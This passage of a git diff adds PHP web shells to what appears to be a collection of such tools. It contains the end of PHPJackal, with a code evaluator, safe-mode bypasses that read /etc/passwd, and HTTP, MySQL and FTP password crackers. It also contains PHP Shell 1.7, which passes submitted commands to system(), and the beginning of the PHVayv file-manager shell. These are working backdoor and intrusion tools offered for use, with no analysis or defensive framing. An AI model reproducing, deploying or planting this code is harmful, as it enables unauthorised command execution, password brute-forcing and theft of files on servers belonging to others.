+echo "<center>${t}Evaler:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Codes:</td><td bgcolor=\"#666666\"><textarea rows=\"10\" name=\"code\" cols=\"64\">";if(!empty($_REQUEST['code']))echo htmlspecialchars($_REQUEST['code']);echo "</textarea></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Execute></td></tr></form></table></center>";
+}
+function whoiS(){
+global $t,$hcwd;
+if (!empty($_REQUEST['server']) && !empty($_REQUEST['domain'])){
+$server =$_REQUEST['server'];
+$domain=$_REQUEST['domain']."\r\n";
+$ser=fsockopen($server,43,$en,$es,5);
+fputs($ser,$domain);
+echo "<pre>";
+while(!feof($ser))echo fgets($ser);
+echo "</pre>";
+fclose($ser);
+}
+else{
+echo "<center>${t}Whois:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['server'])) echo htmlspecialchars($_REQUEST['server']);else echo "whois.geektools.com"; echo "\" name=server size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">domain:</td><td bgcolor=\"#808080\"><input type=text name=domain value=\"";if (!empty($_REQUEST['domain'])) echo htmlspecialchars($_REQUEST['domain']); else echo "google.com"; echo  "\" size=35></td><tr><td bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=\"Do\"></td></tr></form></table></center>";
+}
+}
+function hexvieW(){
+if (!empty($_REQUEST['filE'])){
+$f = $_REQUEST['filE'];
+echo "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"100%\"><td width=\"10%\" bgcolor=\"#282828\">Offset</td><td width=\"25%\" bgcolor=\"#282828\">Hex</td><td width=\"25%\" bgcolor=\"#282828\"></td><td width=\"40%\" bgcolor=\"#282828\">ASCII</td></tr>";
+$file = fopen($f,"r");
+$i= -1;
+while (!feof($file)) {
+$ln='';
+$i++;
+echo "<tr><td width=\"10%\" bgcolor=\"#";
+if ($i % 2==0) echo "666666";else echo "808080";
+echo "\">";echo str_repeat("0",(8-strlen($i * 16))).$i * 16;echo "</td>";
+echo "<td width=\"25%\" bgcolor=\"#";
+if ($i % 2==0) echo "666666";else echo "808080"; 
+echo "\">";
+for ($j=0;$j<=7;$j++){
+if (!feof($file)){
+$tmp = strtoupper(dechex(ord(fgetc($file))));
+if (strlen($tmp)==1) $tmp = "0".$tmp;
+echo $tmp." ";
+$ln.=$tmp;
+}
+}
+echo "</td><td width=\"25%\" bgcolor=\"#";
+if ($i % 2==0) echo "666666";else echo "808080"; 
+echo "\">";
+for ($j=7;$j<=14;$j++){
+if (!feof($file)){
+$tmp = strtoupper(dechex(ord(fgetc($file))));
+if (strlen($tmp)==1) $tmp = "0".$tmp;
+echo $tmp." ";
+$ln.=$tmp;
+}
+}
+echo "</td><td width=\"40%\" bgcolor=\"#";
+if ($i % 2==0) echo "666666";else echo "808080";
+echo "\">";
+$n=0;$asc="";$co=0;
+for ($k=0;$k<=16;$k++){
+$co=hexdec(substr($ln,$n,2));
+if (($co<=31)||(($co>=127)&&($co<=160)))$co=46;
+$asc.= chr($co);
+$n+=2;
+}
+echo htmlspecialchars($asc);
+echo "</td></tr>";
+}
+}
+fclose($file);
+echo "</table>";
+}
+function safemodE(){
+global $windows,$t,$hcwd;
+if (!empty($_REQUEST['file'])){
+$i=1;
+echo "<pre>\n<font color=green>Method $i:(ini_restore)</font><font color=blue>\n";
+ini_restore("safe_mode");ini_restore("open_basedir");
+$tmp = file_get_contents($_REQUEST['file']);
+echo $tmp;
+$i++;
+echo "\n</font><font color=green>Method $i:(copy)</font><font color=blue>\n";
+$tmp=tempnam("","cx");
+copy("compress.zlib://".$_REQUEST['file'], $tmp);
+$fh = fopen($tmp, "r");
+$data = fread($fh, filesize($tmp));
+fclose($fh);
+echo $data;
+$i++;
+if(function_exists("curl_init")){
+echo "\n</font><font color=green>Method $i:(curl_init)[A]</font><font color=blue>\n";
+$fh = @curl_init("file://".$_REQUEST['file']."");
+$tmp = @curl_exec($fh);
+echo $tmp;
+$i++;
+echo "\n</font><font color=green>Method $i:(curl_init)[B]</font><font color=blue>\n";
+$i++;
+if(strstr($_REQUEST['file'],DIRECTORY_SEPARATOR))
+$ch =curl_init("file:///".$_REQUEST['file']."\x00/../../../../../../../../../../../../".__FILE__);
+else $ch = curl_init("file://".$_REQUEST['file']."\x00".__FILE__);
+curl_exec($ch);
+var_dump(curl_exec($ch));
+}
+if($_REQUEST['file'] == "/etc/passwd"){
+echo "\n</font><font color=green>Method $i:(posix)</font><font color=blue>\n";
+for($uid=0;$uid<99999;$uid++){
+$h=posix_getpwuid($uid);
+if (!empty($h))foreach($h as $v)echo "$v:";}}
+$i++;
+echo "</pre></font>";
+}
+echo "<center>${t}Anti Safe-Mode:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">File:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['file'])) echo htmlspecialchars($_REQUEST['file']);elseif(!$windows) echo "/etc/passwd"; echo "\" name=file size=35></td></tr><tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=\"Read\"></td></tr></form></table></center>";
+}
+function crackeR(){
+global $et;
+$cwd = getcwd();
+echo "<center><table border=0 bgcolor=#333333><tr><td><a href=\"".hlinK("seC=hc&workingdiR=$cwd")."\">[Hash]</a> - <a href=\"".hlinK("seC=smtp&workingdiR=$cwd")."\">[SMTP]</a> - <a href=\"".hlinK("seC=pop3&workingdiR=$cwd")."\">[POP3]</a> - <a href=\"".hlinK("seC=imap&workingdiR=$cwd")."\">[IMAP]</a> - <a href=\"".hlinK("seC=ftp&workingdiR=$cwd")."\">[FTP]</a> - <a href=\"".hlinK("seC=snmp&workingdiR=$cwd")."\">[SNMP]</a> - <a href=\"".hlinK("seC=sql&workingdiR=$cwd")."\">[MySQL]</a> - <a href=\"".hlinK("seC=fcr&workingdiR=$cwd")."\">[HTTP form]</a> - <a href=\"".hlinK("seC=auth&workingdiR=$cwd")."\">[HTTP Auth(basic)]</a> - <a href=\"".hlinK("seC=dic&workingdiR=$cwd")."\">[Dictionary maker]</a>$et</center>";
+}
+function dicmakeR(){
+global $errorbox,$windows,$footer,$t,$et,$hcwd;
+if (!empty($_REQUEST['combo'])&&($_REQUEST['combo']==1)) $combo=1 ; else $combo=0;
+if (!empty($_REQUEST['range']) && !empty($_REQUEST['output']) && !empty($_REQUEST['min']) && !empty($_REQUEST['max'])){
+$min = $_REQUEST['min'];
+$max = $_REQUEST['max'];
+if($max<$min)die($errorbox ."Bad input!$et". $footer);
+$s =$w="";
+$out = $_REQUEST['output'];
+$r = ($_REQUEST['range']=='a' )?'a':'A';
+if ($_REQUEST['range']==0) $r=0;
+for($i=0;$i<$min;$i++) $s.=$r;
+$dic = fopen($out,'a');
+if(is_nan($r)){
+while(strlen($s)<=$max){
+$w = $s;
+if($combo)$w="$w:$w";
+fwrite($dic,$w."\n");
+$s++;}
+}
+else{
+while(strlen($w)<=$max){
+$w =(string)str_repeat("0",($min - strlen($s))).$s;
+if($combo)$w="$w:$w";
+fwrite($dic,$w."\n");
+$s++;}
+}
+fclose($dic);
+echo "<font color=blue>Done</font>";
+}
+if (!empty($_REQUEST['input']) && !empty($_REQUEST['output'])){
+$input=fopen($_REQUEST['input'],'r');
+if (!$input){
+if ($windows)echo $errorbox. "Unable to read from ".htmlspecialchars($_REQUEST['input']) ."$et<br>";
+else{
+$input=explode("\n",shelL("cat $input"));
+$output=fopen($_REQUEST['output'],'w');
+if ($output){
+foreach ($input as $in){
+$user = $in;
+$user = trim(fgets($in)," \n\r");
+if (!strstr($user,":"))continue;
+$user=substr($user,0,(strpos($user,':')));
+if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n");
+}
+fclose($input);fclose($output);
+echo "<font color=blue>Done</font>";
+}
+}
+}
+else{
+$output=fopen($_REQUEST['output'],'w');
+if ($output){
+while (!feof($input)){
+$user = trim(fgets($input)," \n\r");
+if (!strstr($user,":"))continue;
+$user=substr($user,0,(strpos($user,':')));
+if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n");
+}
+fclose($input);fclose($output);
+echo "<font color=blue>Done</font>";
+}
+else echo $errorbox." Unable to write data to ".htmlspecialchars($_REQUEST['input']) ."$et<br>";
+}
+}elseif (!empty($_REQUEST['url']) && !empty($_REQUEST['output'])){
+$res=downloadiT($_REQUEST['url'],$_REQUEST['output']);
+if($combo && $res){
+$file=file($_REQUEST['output']);
+$output=fopen($_REQUEST['output'],'w');
+foreach ($file as $v)fwrite($output,"$v:$v\n");
+fclose($output);
+}
+echo "<font color=blue>Done</font>";
+}else{
+$temp=whereistmP();
+echo "<center>${t}Wordlist generator:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Range:</td><td bgcolor=\"#666666\"><select name=range><option value=a>a-z</option><option value=Z>A-Z</option><option value=0>0-9</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Min lenght:</td><td bgcolor=\"#808080\"><select name=min><option value=1>1</option><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8>8</option><option value=9>9</option><option value=10>10</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Max lenght:</td><td bgcolor=\"#666666\"><select name=max><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8 selected>8</option><option value=9>9</option><option value=10>10</option><option value=11>11</option><option value=12>12</option><option value=13>13</option><option value=14>14</option><option value=15>15</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox name=combo style=\"border-width:1px;background-color:#666666;\" value=1 checked>Combo style output</td></tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Make></td></tr></form></table><br>${t}Grab dictionary:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Grab from:</td><td bgcolor=\"#666666\"><input type=text value=\"/etc/passwd\" name=input size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Grab></td></tr></form></table><br>${t}Download dictionary:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">URL:</td><td bgcolor=\"#666666\"><input type=text value=\"http://vburton.ncsa.uiuc.edu/wordlist.txt\" name=url size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr><tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Get></td></tr></form></table></center>";}
+}
+function calC(){
+global $t,$et,$hcwd;
+$fu = array('-','md5','sha1','crc32','hex','ip2long','long2ip','base64_encode','base64_decode','urldecode','urlencode');
+if (!empty($_REQUEST['input']) && (in_array($_REQUEST['to'],$fu))){
+echo "<center>${t}Output:<br><textarea rows=\"10\" cols=\"64\">";
+if($_REQUEST['to']!='hex')echo $_REQUEST['to']($_REQUEST['input']);else for($i=0;$i<strlen($_REQUEST['input']);$i++)echo strtoupper(dechex(ord($_REQUEST['input']{$i})));
+echo "</textarea>$et</center><br>";
+}
+echo "<center>${t}Convertor:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Input:</td><td bgcolor=\"#666666\"><textarea rows=\"10\" name=\"input\" cols=\"64\">";if(!empty($_REQUEST['input']))echo htmlspecialchars($_REQUEST['input']);echo "</textarea></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Task:</td><td bgcolor=\"#808080\"><select size=1 name=to><option value=md5>MD5</option><option value=sha1>SHA1</option><option value=crc32>crc32</option><option value=ip2long>IP to long</option><option value=long2ip>Long to IP</option><option value=hex>HEX</option><option value=urlencode>URL encoding</option><option value=urldecode>URL decoding</option><option value=base64_encode>Base64 encoding</option><option value=base64_decode>Base64 decoding</option></select></td><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Convert></td></tr>$hcwd</form></table></center>";
+}
+function authcrackeR(){
+global $errorbox,$et,$t,$crack,$hcwd;
+if(!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
+$data='';
+$method=($_REQUEST['method'])?'POST':'GET';
+if(strstr($_REQUEST['target'],'?')){$data=substr($_REQUEST['target'],strpos($_REQUEST['target'],'?')+1);$_REQUEST['target']=substr($_REQUEST['target'],0,strpos($_REQUEST['target'],'?'));}
+spliturL($_REQUEST['target'],$host,$page);
+$type=$_REQUEST['combo'];
+$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
+if($method='GET')$page.=$data;
+$dictionary=fopen($_REQUEST['dictionary'],'r');
+echo "<font color=blue>";
+while(!feof($dictionary)){
+if($type){
+$combo=trim(fgets($dictionary)," \n\r");
+$user=substr($combo,0,strpos($combo,':'));
+$pass=substr($combo,strpos($combo,':')+1);
+}else{
+$pass=trim(fgets($dictionary)," \n\r");
+}
+$so=fsockopen($host,80,$en,$es,5);
+if(!$so){echo "$errorbox Can not connect to host$et";break;}
+else{
+$packet="$method /$page HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nConnection: Close\r\nAuthorization: Basic ".base64_encode("$user:$pass");
+if($method=='POST')$packet.="Content-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($data);
+$packet.="\r\n\r\n";
+$packet.=$data;
+fputs($so,$packet);
+$res=substr(fgets($so),9,2);
+fclose($so);
+if($res=='20')echo "U: $user P: $pass</br>";
+flusheR();
+}
+}
+echo "Done!</font>";
+}else echo "<center><form method=\"POST\" name=form>${t}HTTP Auth cracker:</td><td bgcolor=\"#333333\"><select name=method><option value=1>POST</option><option value=0>GET</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>";
+}
+function sqlcrackeR(){
+global $errorbox,$t,$et,$crack;
+if (!function_exists("mysql_connect")){
+echo "$errorbox Server does n`t support MySQL$et";
+}
+else{
+if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
+$target=$_REQUEST['target'];
+$type=$_REQUEST['combo'];
+$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
+$dictionary=fopen($_REQUEST['dictionary'],'r');
+if ($dictionary){
+echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";
+while(!feof($dictionary)){
+if($type){
+$combo=trim(fgets($dictionary)," \n\r");
+$user=substr($combo,0,strpos($combo,':'));
+$pass=substr($combo,strpos($combo,':')+1);
+}else{
+$pass=trim(fgets($dictionary)," \n\r");
+}
+$sql=@mysql_connect($target,$user,$pass);
+if($sql){echo "U: $user P: $pass (<a href=\"".hlinK("seC=mysql&serveR=$target&useR=$user&pasS=$pass&querY=SHOW+DATABASES&workingdiR=".getcwd())."\">Connect</a>)<br>";mysql_close($sql);if(!$type)break;}
+flusheR();
+}
+echo "<br>Done</font>";
+fclose($dictionary);
+}
+else{
+echo "$errorbox Can not open dictionary.$et";
+}
+}
+else{
+echo "<center>${t}MySQL cracker:$crack";
+}
+}
+}
+function ftpcrackeR(){
+global $errorbox,$t,$et,$crack;
+if (!function_exists("ftp_connect"))echo "$errorbox Server does n`t support FTP functions$et";
+else{
+if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
+$target=$_REQUEST['target'];
+$type=$_REQUEST['combo'];
+$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
+$dictionary=fopen($_REQUEST['dictionary'],'r');
+if ($dictionary){
+echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";
+while(!feof($dictionary)){
+if($type){
+$combo=trim(fgets($dictionary)," \n\r");
+$user=substr($combo,0,strpos($combo,':'));
+$pass=substr($combo,strpos($combo,':')+1);
+}else{
+$pass=trim(fgets($dictionary)," \n\r");
+}
+if(!$ftp=ftp_connect($target,21,8)){echo "$errorbox Can not connect to server.$et";break;}
+if (@ftp_login($ftp,$user,$pass)){echo "U: $user P: $pass<br>";if(!$type)break;}
+ftp_close($ftp);
+flusheR();
+}
+echo "<br>Done</font>";
+fclose($dictionary);
+}
+else{
+echo "$errorbox Can not open dictionary.$et";
+}
+}
+else echo "<center>${t}FTP cracker:$crack";
+}}
+function openiT($name){
+$ext=strtolower(substr($name,strrpos($name,'.')+1));
+$src=array('php','php3','php4','phps','phtml','phtm','inc');
+if(in_array($ext,$src))highlight_file($name);
+else echo "<font color=blue><pre>".htmlspecialchars(file_get_contents($name))."</pre></font>";
+}
+function logouT(){
+setcookie('passw','',time()-10000);
+header('Location: '.hlinK());
+}
+?>
+<html>
+<head>
+<style>body{scrollbar-base-color: #484848; scrollbar-arrow-color: #FFFFFF; scrollbar-track-color: #969696;font-size:16px;font-family:"Arial Narrow";}Table { font-size: 15px; } .buttons{font-family:Verdana;font-size:10pt;font-weight:normal;font-style:normal;color:#FFFFFF;background-color:#555555;border-style:solid;border-width:1px;border-color:#FFFFFF;}textarea{border: 0px #000000 solid;background: #EEEEEE;color: #000000;}input{background: #EEEEEE;border-width:1px;border-style:solid;border-color:black}select{background: #EEEEEE; border: 0px #000000 none;}</style>
+<meta http-equiv="Content-Language" content="en-us">
+<title>PHPJackal</title>
+</head><body text="#E2E2E2" bgcolor="#C0C0C0" link="#DCDCDC" vlink="#DCDCDC" alink="#DCDCDC">
+<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#282828" bgcolor="#333333" width="100%">
+<tr><td><a href=javascript:history.back(1)>[Back]</a> - <a href="<?php $cwd= getcwd(); echo hlinK("seC=sysinfo&workingdiR=$cwd");?>">[Info]</a> - <a href="<?php echo hlinK("seC=fm&workingdiR=$cwd");?>">[File manager]</a> - <a href="<?php echo hlinK("seC=edit&workingdiR=$cwd");?>">[Editor]</a> - <a href="<?php echo hlinK("seC=webshell&workingdiR=$cwd");?>">[Web shell]</a> - <a href="<?php echo hlinK("seC=br&workingdiR=$cwd");?>">[B/R shell]</a> - <a href="<?php echo hlinK("seC=asm&workingdiR=$cwd");?>">[Safe-mode]</a> - <a href="<?php echo hlinK("seC=mysql&workingdiR=$cwd"); ?>">[SQL]</a> - <a href="<?php echo hlinK("seC=mailer&workingdiR=$cwd"); ?>">[Mailer]</a> - <a href="<?php echo hlinK("seC=eval&workingdiR=$cwd");?>">[Evaler]</a> - <a href="<?php echo hlinK("seC=sc&workingdiR=$cwd"); ?>">[Scanners]</a> - <a href="<?php echo hlinK("seC=cr&workingdiR=$cwd");?>">[Crackers]</a> - <a href="<?php echo hlinK("seC=px&workingdiR=$cwd");?>">[Pr0xy]</a> - <a href="<?php echo hlinK("seC=whois&workingdiR=$cwd");?>">[Whois]</a> - <a href="<?php echo hlinK("seC=calc&workingdiR=$cwd");?>">[Convert]</a> - <a href="<?php echo hlinK("seC=about&workingdiR=$cwd");?>">[About]</a> <?php if(isset($_COOKIE['passw'])) echo "- [<a href=\"".hlinK("seC=logout")."\">Logout</a>]";?></td></tr></table>
+<hr size=1 noshade>
+<?php
+if (!empty($_REQUEST['seC'])){
+switch($_REQUEST['seC']){
+case 'fm':filemanager();break;
+case 'sc':scanneR();break;
+case 'phpinfo': phpinfo();break;
+case 'edit': if (!empty($_REQUEST['open']))editoR($_REQUEST['filE']);
+if (!empty($_REQUEST['Save'])){
+$filehandle= fopen($_REQUEST['file'],"w");
+fwrite($filehandle,$_REQUEST['edited']);
+fclose($filehandle);}
+if (!empty($_REQUEST['filE'])) editoR($_REQUEST['filE']);else editoR('');
+break;
+case 'openit':openiT($_REQUEST['namE']);break;
+case 'cr': crackeR();break;
+case 'dic':dicmakeR();break;
+case 'whois':whoiS();break;
+case 'hex':hexvieW();break;
+case 'img':showimagE($_REQUEST['filE']);break;
+case 'inc':include ($_REQUEST['filE']);break;
+case 'hc':hashcrackeR();break;
+case 'fcr':formcrackeR();break;
+case 'snmp':snmpcrackeR();break;
+case 'sql':sqlcrackeR();break;
+case 'auth':authcrackeR();break;
+case 'pop3':pop3crackeR();break;
+case 'imap':imapcrackeR();break;
+case 'smtp':smtpcrackeR();break;
+case 'ftp':ftpcrackeR();break;
+case 'eval':phpevaL();break;
+case 'px':pr0xy();break;
+case 'webshell':webshelL();break;
+case 'mailer':maileR();break;
+case 'br':brshelL();break;
+case 'asm':safemodE();break;
+case 'mysql':mysqlclienT();break;
+case 'calc':calC();break;
+case 'sysinfo':sysinfO();break;
+case 'checksum':checksuM($_REQUEST['filE']);break;
+case 'logout':logouT();break;
+default: echo $intro;
+}}else echo $intro;
+echo $footer;?></body></html>
\ No newline at end of file
diff --git a/138shell/P/phpshell17.txt b/138shell/P/phpshell17.txt
new file mode 100644
index 0000000..d488436
--- /dev/null
+++ b/138shell/P/phpshell17.txt
@@ -0,0 +1,177 @@
+<?php
+
+define(´PHPSHELL_VERSION´, ´1.7´);
+
+/*
+
+**************************************************************
+* PHP Shell *
+**************************************************************
+$Id: phpshell.php,v 1.18 2002/09/18 15:49:54 gimpster Exp $
+
+PHP Shell is aninteractive PHP-page that will execute any command
+entered. See the files README and INSTALL or http://www.gimpster.com
+for further information.
+
+Copyright (C) 2000-2002 Martin Geisler < gimpster@gimpster.com>
+
+This program is free software; you can redistribute it and/or
+modify it under the terms of the GNU General Public License
+as published by the Free Software Foundation; either version 2
+of the License, or (at your option) any later version.
+
+This program is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+GNU General Public License for more details.
+
+You can get a copy of the GNU General Public License from this
+address: http://www.gnu.org/copyleft/gpl.html#SEC1
+You can also write to the Free Software Foundation, Inc., 59 Temple
+Place - Suite 330, Boston, MA 02111-1307, USA.
+
+*/
+?>
+
+<html>
+<head>
+<title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]<?php echo PHPSHELL_VERSION ?></title>
+</head>
+<body>
+<h1>[YOUR HEADER[ <?php echo PHPSHELL_VERSION ?> [ADITTIONAL TEXT] -
+[ADDITIONAL TEXT]</h1><br><hr><marquee><b>[ADDITIONAL MESSEGE OR TEXT]</b></marquee><hr><br>
+
+<?php
+
+if (ini_get(´register_globals´) != ´1´) {
+/* We´ll register the variables as globals: */
+if (!empty($HTTP_POST_VARS))
+extract($HTTP_POST_VARS);
+
+if (!empty($HTTP_GET_VARS))
+extract($HTTP_GET_VARS);
+
+if (!empty($HTTP_SERVER_VARS))
+extract($HTTP_SERVER_VARS);
+}
+
+/* First we check if there has been asked for a working directory. */
+if (!empty($work_dir)) {
+/* A workdir has been asked for */
+if (!empty($command)) {
+if (ereg(´^[[:blank:]]*cd[[:blank:]]+([^;]+)$´, $command, $regs)) {
+/* We try and match a cd command. */
+if ($regs[1][0] == ´/´) {
+$new_dir = $regs[1]; // ´cd /something/...´
+} else {
+$new_dir = $work_dir . ´/´ . $regs[1]; // ´cd somedir/...´
+}
+if (file_exists($new_dir) && is_dir($new_dir)) {
+$work_dir = $new_dir;
+}
+unset($command);
+}
+}
+}
+
+if (file_exists($work_dir) && is_dir($work_dir)) {
+/* We change directory to that dir: */
+chdir($work_dir);
+}
+
+/* We now update $work_dir to avoid things like ´/foo/../bar´: */
+$work_dir = exec(´pwd´);
+
+?>
+
+<form name="myform" action="<?php echo $PHP_SELF ?>" method="post">
+<p>Current working directory: <b>
+<?php
+
+$work_dir_splitted = explode(´/´, substr($work_dir, 1));
+
+echo ´<a xhref="´ . $PHP_SELF . ´?work_dir=/">Root</a>/´;
+
+if (!empty($work_dir_splitted[0])) {
+$path = ´´;
+for ($i = 0; $i < count($work_dir_splitted); $i++) {
+$path .= ´/´ . $work_dir_splitted[$i];
+printf(´<a xhref="%s?work_dir=%s">%s</a>/´,
+$PHP_SELF, urlencode($path), $work_dir_splitted[$i]);
+}
+}
+
+?></b></p>
+<p>Choose new working directory:
+<select name="work_dir" onChange="this.form.submit()">
+<?php
+/* Now we make a list of the directories. */
+$dir_handle = opendir($work_dir);
+/* Run through all the files and directories to find the dirs. */
+while ($dir = readdir($dir_handle)) {
+if (is_dir($dir)) {
+if ($dir == ´.´) {
+echo "<option value="$work_dir" selected>Current Directory</option> ";
+} elseif ($dir == ´..´) {
+/* We have found the parent dir. We must be carefull if the parent
+directory is the root directory (/). */
+if (strlen($work_dir) == 1) {
+/* work_dir is only 1 charecter - it can only be / There´s no
+parent directory then. */
+} elseif (strrpos($work_dir, ´/´) == 0) {
+/* The last / in work_dir were the first charecter.
+This means that we have a top-level directory
+eg. /bin or /home etc... */
+echo "<option value="/">Parent Directory</option> ";
+} else {
+/* We do a little bit of string-manipulation to find the parent
+directory... Trust me - it works :-) */
+echo "<option value="". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."">Parent Directory</option> ";
+}
+} else {
+if ($work_dir == ´/´) {
+echo "<option value="$work_dir$dir">$dir</option> ";
+} else {
+echo "<option value="$work_dir/$dir">$dir</option> ";
+}
+}
+}
+}
+closedir($dir_handle);
+
+?>
+
+</select></p>
+
+<p>Command: <input type="text" name="command" size="60">
+<input name="submit_btn" type="submit" value="Execute Command"></p>
+
+<p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"></p>
+<textarea cols="80" rows="20" readonly>
+
+<?php
+if (!empty($command)) {
+if ($stderr) {
+$tmpfile = tempnam(´/tmp´, ´phpshell´);
+$command .= " 1> $tmpfile 2>&1; " .
+"cat $tmpfile; rm $tmpfile";
+} else if ($command == ´ls´) {
+/* ls looks much better with ´ -F´, IMHO. */
+$command .= ´ -F´;
+}
+system($command);
+}
+?>
+
+</textarea>
+</form>
+
+<script language="JavaScript" type="text/javascript">
+document.forms[0].command.focus();
+</script>
+
+<hr>
+<i>Copyright © 2004–2005, <a
+href="mailto: [YOU CAN ENTER YOUR MAIL HERE]- [ADDITIONAL TEXT]</a></i>
+</body>
+</html>
\ No newline at end of file
diff --git a/138shell/P/phvayv.php.txt b/138shell/P/phvayv.php.txt
new file mode 100644
index 0000000..c01e2c7
--- /dev/null
+++ b/138shell/P/phvayv.php.txt
@@ -0,0 +1,597 @@
+<? if($sistembilgisi > "") {phpinfo();} else { ?>
+
+
+<?$fistik=PHVayv;?>
+
+
+<?if ($sildos>"") {unlink("$dizin/$sildos");} ?>
+
+<?if ($dizin== ""){$dizin=realpath('.');}{$dizin=realpath($dizin);}?>
+
+<?if ($silklas > ""){rmdir($silklas);}?>
+
+<?if ($yeniklasor > "") {mkdir("$dizin/$duzenx2",777);}?>
+
+
+
+<?if ($yenidosya == "1") {
+$baglan=fopen("$dizin/$duzenx2",'w');
+fwrite($baglan,$duzenx);
+fclose($baglan);}
+?>
+
+
+
+
+<?if ($duzkaydet > "") {
+
+$baglan=fopen($duzkaydet,'w');
+fwrite($baglan,$duzenx);
+fclose($baglan);}
+?>
+
+
+
+
+<?if ($yenklas>"") {;?>
+<body topmargin="0" leftmargin="0">
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliştirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
